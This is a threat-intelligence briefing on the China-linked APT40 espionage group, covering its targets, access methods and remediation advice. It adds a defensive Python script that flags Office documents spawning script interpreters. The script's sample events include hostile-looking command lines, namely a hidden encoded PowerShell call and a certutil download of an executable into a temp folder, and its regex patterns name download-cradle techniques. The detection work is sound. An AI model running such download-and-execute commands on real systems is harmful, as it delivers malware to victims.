APT40: Examining a China-Nexus Espionage Actor
(Mar 4, 2019)
Researchers at FireEye have publicly named a new Advanced Persistent Threat (APT) group, "APT40", and tied it to a 2016 campaign that targeted the defence, education, engineering, maritime, and transportation sectors. The group targeted organisations in multiple countries, including Belgium, Cambodia, Germany, Hong Kong, Malaysia, Norway, the Philippines, Saudi Arabia, Switzerland, the United States, and the United Kingdom. In one operation APT40 masqueraded as an Unmanned Underwater Vehicle (UUV) manufacturer in an attempt to illicitly acquire information and technology that would advance China's naval capabilities. For initial access APT40 uses web server exploitation, exploitation of publicly catalogued (registered) vulnerabilities, and malicious phishing documents, among other techniques; once inside a network it deploys a variety of malware to conduct reconnaissance, escalate privileges, establish a persistent foothold, and exfiltrate data back to the group.
Recommendation: Many of these attacks can be detected by less conventional methods such as behaviour analysis and heuristic or machine learning-based detection systems. Because the intrusions frequently begin with spear phishing, that is the best place to focus your energy: employee education can stop a malicious document before it is ever opened, and all users should be aware of the threats they face when doing something as routine as checking their email. In the event of a compromise, the entire network must be assessed to identify the initial point of infection, and all affected systems must be fully wiped and rebuilt to restore the network to a known-safe state. Because APT40 escalates privileges and establishes a foothold before exfiltrating, any credentials the intruder could have captured must be reset alongside the rebuild, otherwise the actor simply logs back in. Defence-in-depth (layered security mechanisms, redundancy, and fail-safe processes) remains the best protection against APTs, with attention to both network and host-based security.
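The behaviour analysis the recommendation refers to can be made concrete. The script below is an added example, not code from the original briefing or from FireEye; the page does not state which process chains APT40's phishing documents produce, so the heuristics are the generic ones for a weaponised Office document (the Office host process spawning a script interpreter or living-off-the-land binary, an encoded PowerShell command line, a download cradle). The JSON-lines events, host names, PIDs and command lines are constructed for illustration and are not APT40 telemetry.

```python
"""Heuristic triage of process-creation events for phishing-document execution.

Added example: flags the behaviour a malicious Office document typically
produces when opened (the Office host spawning a script interpreter or LOLBin),
plus two command-line heuristics. All events below are constructed samples.
"""
import json
import re

# Office applications that host the documents delivered by phishing email.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Children an Office document has no legitimate reason to spawn.
LOLBIN_CHILDREN = {
    "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}

# Encoded PowerShell command switch (-e, -ec, -enc, -EncodedCommand).
ENCODED_PS = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)(?:\s|$)")

# Common download cradles used to fetch a second stage.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|certutil.*-urlcache"
)


def _basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event):
    """Return the list of heuristic names an event trips (empty list = benign)."""
    parent = _basename(event.get("parent_image", ""))
    child = _basename(event.get("image", ""))
    cmdline = event.get("command_line", "")
    reasons = []
    if parent in OFFICE_HOSTS and child in LOLBIN_CHILDREN:
        reasons.append("office_spawns_" + child)
    if child == "powershell.exe" and ENCODED_PS.search(cmdline):
        reasons.append("encoded_powershell")
    if DOWNLOAD_CRADLE.search(cmdline):
        reasons.append("download_cradle")
    return reasons


def triage(jsonl_lines):
    """Run score_event over JSON-lines process-creation events; return the hits."""
    findings = []
    for line in jsonl_lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = score_event(event)
        if reasons:
            findings.append({
                "host": event.get("host"),
                "pid": event.get("pid"),
                "parent": _basename(event.get("parent_image", "")),
                "image": _basename(event.get("image", "")),
                "reasons": reasons,
            })
    return findings


# Constructed sample telemetry (Sysmon-style fields); hosts, PIDs and command
# lines are made up for this example and are not observed APT40 activity.
SAMPLE_EVENTS = r"""
{"host":"ws01","pid":4120,"parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell.exe -NoP -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"host":"ws01","pid":3988,"parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","command_line":"\"WINWORD.EXE\" /n C:\\Users\\jdoe\\Downloads\\proposal.docx"}
{"host":"ws02","pid":5204,"parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","image":"C:\\Windows\\System32\\cmd.exe","command_line":"cmd.exe /c certutil -urlcache -split -f http://example.invalid/update.txt %TEMP%\\svc.exe"}
{"host":"ws02","pid":5310,"parent_image":"C:\\Windows\\System32\\svchost.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"}
{"host":"ws03","pid":2210,"parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","command_line":"\"WINWORD.EXE\" /n /dde"}
"""


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS.splitlines()):
        print(json.dumps(hit))
```

Of the five sample events only two are flagged: Word spawning an encoded PowerShell command, and Excel spawning cmd.exe with a certutil download cradle. Outlook opening Word and a service launching an inventory script pass, which is the point of keying on the parent process rather than on PowerShell alone. In production the encoded-command and cradle checks will still hit legitimate administration scripts, so treat them as enrichment on top of the parent-child rule rather than as standalone alerts.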
ThreatStream users can view the Indicators of Compromise (IOCs) associated with this story to identify potential malicious activity in their own environments.